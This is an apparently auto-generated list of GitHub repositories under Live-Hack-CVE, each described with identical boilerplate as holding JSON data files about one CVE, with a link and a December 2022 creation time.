**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2012-4681 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2012-4681](https://github.com/Live-Hack-CVE/CVE-2012-4681) create time: 2022-12-22T08:45:42Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2013-5843 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2013-5843](https://github.com/Live-Hack-CVE/CVE-2013-5843) create time: 2022-12-22T08:45:29Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2013-5842 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2013-5842](https://github.com/Live-Hack-CVE/CVE-2013-5842) create time: 2022-12-22T08:45:03Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2013-5830 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2013-5830](https://github.com/Live-Hack-CVE/CVE-2013-5830) create time: 2022-12-22T08:44:51Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2013-5829 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2013-5829](https://github.com/Live-Hack-CVE/CVE-2013-5829) create time: 2022-12-22T08:44:38Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2013-0791 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2013-0791](https://github.com/Live-Hack-CVE/CVE-2013-0791) create time: 2022-12-22T08:40:34Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2013-1620 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2013-1620](https://github.com/Live-Hack-CVE/CVE-2013-1620) create time: 2022-12-22T08:31:31Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-16891 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-16891](https://github.com/Live-Hack-CVE/CVE-2019-16891) create time: 2022-12-22T08:24:51Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-2372 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-2372](https://github.com/Live-Hack-CVE/CVE-2021-2372) create time: 2022-12-22T08:44:25Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-31650 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-31650](https://github.com/Live-Hack-CVE/CVE-2021-31650) create time: 2022-12-22T08:24:26Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-38241 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-38241](https://github.com/Live-Hack-CVE/CVE-2021-38241) create time: 2022-12-22T08:24:13Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-46695 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-46695](https://github.com/Live-Hack-CVE/CVE-2022-46695) create time: 2022-12-22T09:00:56Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-42846 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-42846](https://github.com/Live-Hack-CVE/CVE-2022-42846) create time: 2022-12-22T09:00:43Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-46694 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-46694](https://github.com/Live-Hack-CVE/CVE-2022-46694) create time: 2022-12-22T09:00:30Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-42845 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-42845](https://github.com/Live-Hack-CVE/CVE-2022-42845) create time: 2022-12-22T09:00:18Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-46693 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-46693](https://github.com/Live-Hack-CVE/CVE-2022-46693) create time: 2022-12-22T09:00:05Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-42844 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-42844](https://github.com/Live-Hack-CVE/CVE-2022-42844) create time: 2022-12-22T08:59:52Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-46692 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-46692](https://github.com/Live-Hack-CVE/CVE-2022-46692) create time: 2022-12-22T08:59:39Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-42843 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-42843](https://github.com/Live-Hack-CVE/CVE-2022-42843) create time: 2022-12-22T08:59:26Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-42842 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-42842](https://github.com/Live-Hack-CVE/CVE-2022-42842) create time: 2022-12-22T08:59:13Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-42837 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-42837](https://github.com/Live-Hack-CVE/CVE-2022-42837) create time: 2022-12-22T08:59:00Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-42821 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-42821](https://github.com/Live-Hack-CVE/CVE-2022-42821) create time: 2022-12-22T08:58:47Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-32942 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-32942](https://github.com/Live-Hack-CVE/CVE-2022-32942) create time: 2022-12-22T08:58:34Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-46691 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-46691](https://github.com/Live-Hack-CVE/CVE-2022-46691) create time: 2022-12-22T08:58:21Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-46690 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-46690](https://github.com/Live-Hack-CVE/CVE-2022-46690) create time: 2022-12-22T08:58:07Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-46689 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-46689](https://github.com/Live-Hack-CVE/CVE-2022-46689) create time: 2022-12-22T08:57:55Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-42867 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-42867](https://github.com/Live-Hack-CVE/CVE-2022-42867) create time: 2022-12-22T08:57:42Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-42866 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-42866](https://github.com/Live-Hack-CVE/CVE-2022-42866) create time: 2022-12-22T08:57:29Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-42865 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-42865](https://github.com/Live-Hack-CVE/CVE-2022-42865) create time: 2022-12-22T08:57:16Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-42864 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-42864](https://github.com/Live-Hack-CVE/CVE-2022-42864) create time: 2022-12-22T08:57:03Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-42863 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-42863](https://github.com/Live-Hack-CVE/CVE-2022-42863) create time: 2022-12-22T08:56:50Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-42859 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-42859](https://github.com/Live-Hack-CVE/CVE-2022-42859) create time: 2022-12-22T08:56:37Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-42851 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-42851](https://github.com/Live-Hack-CVE/CVE-2022-42851) create time: 2022-12-22T08:56:24Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-42841 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-42841](https://github.com/Live-Hack-CVE/CVE-2022-42841) create time: 2022-12-22T08:56:12Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-42840 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-42840](https://github.com/Live-Hack-CVE/CVE-2022-42840) create time: 2022-12-22T08:55:59Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-30115 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-30115](https://github.com/Live-Hack-CVE/CVE-2022-30115) create time: 2022-12-22T08:55:46Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-42916 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-42916](https://github.com/Live-Hack-CVE/CVE-2022-42916) create time: 2022-12-22T08:55:33Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-34916 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-34916](https://github.com/Live-Hack-CVE/CVE-2022-34916) create time: 2022-12-22T08:55:21Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-4523 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-4523](https://github.com/Live-Hack-CVE/CVE-2022-4523) create time: 2022-12-22T08:55:07Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-4524 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-4524](https://github.com/Live-Hack-CVE/CVE-2022-4524) create time: 2022-12-22T08:54:55Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-4525 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-4525](https://github.com/Live-Hack-CVE/CVE-2022-4525) create time: 2022-12-22T08:54:42Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-36623 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-36623](https://github.com/Live-Hack-CVE/CVE-2020-36623) create time: 2022-12-22T08:18:55Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-36621 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-36621](https://github.com/Live-Hack-CVE/CVE-2020-36621) create time: 2022-12-22T08:18:42Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-36622 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-36622](https://github.com/Live-Hack-CVE/CVE-2020-36622) create time: 2022-12-22T08:18:29Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-36620 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-36620](https://github.com/Live-Hack-CVE/CVE-2020-36620) create time: 2022-12-22T08:18:16Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-4274 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-4274](https://github.com/Live-Hack-CVE/CVE-2021-4274) create time: 2022-12-22T08:21:29Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-4273 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-4273](https://github.com/Live-Hack-CVE/CVE-2021-4273) create time: 2022-12-22T08:21:17Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-4272 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-4272](https://github.com/Live-Hack-CVE/CVE-2021-4272) create time: 2022-12-22T08:21:04Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-4271 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-4271](https://github.com/Live-Hack-CVE/CVE-2021-4271) create time: 2022-12-22T08:20:51Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-4270 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-4270](https://github.com/Live-Hack-CVE/CVE-2021-4270) create time: 2022-12-22T08:20:38Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-4269 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-4269](https://github.com/Live-Hack-CVE/CVE-2021-4269) create time: 2022-12-22T08:20:24Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-4268 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-4268](https://github.com/Live-Hack-CVE/CVE-2021-4268) create time: 2022-12-22T08:20:12Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-4267 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-4267](https://github.com/Live-Hack-CVE/CVE-2021-4267) create time: 2022-12-22T08:19:59Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-4266 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-4266](https://github.com/Live-Hack-CVE/CVE-2021-4266) create time: 2022-12-22T08:19:46Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-4265 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-4265](https://github.com/Live-Hack-CVE/CVE-2021-4265) create time: 2022-12-22T08:19:33Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-4264 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-4264](https://github.com/Live-Hack-CVE/CVE-2021-4264) create time: 2022-12-22T08:19:20Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-4263 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-4263](https://github.com/Live-Hack-CVE/CVE-2021-4263) create time: 2022-12-22T08:19:07Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-39426 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-39426](https://github.com/Live-Hack-CVE/CVE-2021-39426) create time: 2022-12-22T08:16:06Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-4275 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-4275](https://github.com/Live-Hack-CVE/CVE-2021-4275) create time: 2022-12-22T08:12:40Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-43657 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-43657](https://github.com/Live-Hack-CVE/CVE-2021-43657) create time: 2022-12-22T08:06:28Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-36631 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-36631](https://github.com/Live-Hack-CVE/CVE-2021-36631) create time: 2022-12-22T08:06:14Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-34427 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-34427](https://github.com/Live-Hack-CVE/CVE-2021-34427) create time: 2022-12-22T08:05:49Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-4632 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-4632](https://github.com/Live-Hack-CVE/CVE-2022-4632) create time: 2022-12-22T08:22:45Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-4631 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-4631](https://github.com/Live-Hack-CVE/CVE-2022-4631) create time: 2022-12-22T08:22:33Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-46096 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-46096](https://github.com/Live-Hack-CVE/CVE-2022-46096) create time: 2022-12-22T08:22:20Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-46095 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-46095](https://github.com/Live-Hack-CVE/CVE-2022-46095) create time: 2022-12-22T08:22:07Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-36222 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-36222](https://github.com/Live-Hack-CVE/CVE-2022-36222) create time: 2022-12-22T08:21:55Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-36221 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-36221](https://github.com/Live-Hack-CVE/CVE-2022-36221) create time: 2022-12-22T08:21:42Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-42543 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-42543](https://github.com/Live-Hack-CVE/CVE-2022-42543) create time: 2022-12-22T08:18:03Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-42542 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-42542](https://github.com/Live-Hack-CVE/CVE-2022-42542) create time: 2022-12-22T08:17:48Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-42535 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-42535](https://github.com/Live-Hack-CVE/CVE-2022-42535) create time: 2022-12-22T08:17:35Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-42544 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-42544](https://github.com/Live-Hack-CVE/CVE-2022-42544) create time: 2022-12-22T08:17:22Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-42531 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-42531](https://github.com/Live-Hack-CVE/CVE-2022-42531) create time: 2022-12-22T08:17:09Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-42530 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-42530](https://github.com/Live-Hack-CVE/CVE-2022-42530) create time: 2022-12-22T08:16:57Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-42529 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-42529](https://github.com/Live-Hack-CVE/CVE-2022-42529) create time: 2022-12-22T08:16:44Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-42534 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-42534](https://github.com/Live-Hack-CVE/CVE-2022-42534) create time: 2022-12-22T08:16:31Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-42532 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-42532](https://github.com/Live-Hack-CVE/CVE-2022-42532) create time: 2022-12-22T08:16:18Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-32943 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-32943](https://github.com/Live-Hack-CVE/CVE-2022-32943) create time: 2022-12-22T08:15:53Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-46135 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-46135](https://github.com/Live-Hack-CVE/CVE-2022-46135) create time: 2022-12-22T08:15:40Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-46137 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-46137](https://github.com/Live-Hack-CVE/CVE-2022-46137) create time: 2022-12-22T08:15:27Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-4130 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-4130](https://github.com/Live-Hack-CVE/CVE-2022-4130) create time: 2022-12-22T08:15:15Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-4326 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-4326](https://github.com/Live-Hack-CVE/CVE-2022-4326) create time: 2022-12-22T08:15:01Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-46109 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-46109](https://github.com/Live-Hack-CVE/CVE-2022-46109) create time: 2022-12-22T08:14:49Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-4567 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-4567](https://github.com/Live-Hack-CVE/CVE-2022-4567) create time: 2022-12-22T08:14:36Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-23551 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-23551](https://github.com/Live-Hack-CVE/CVE-2022-23551) create time: 2022-12-22T08:14:23Z

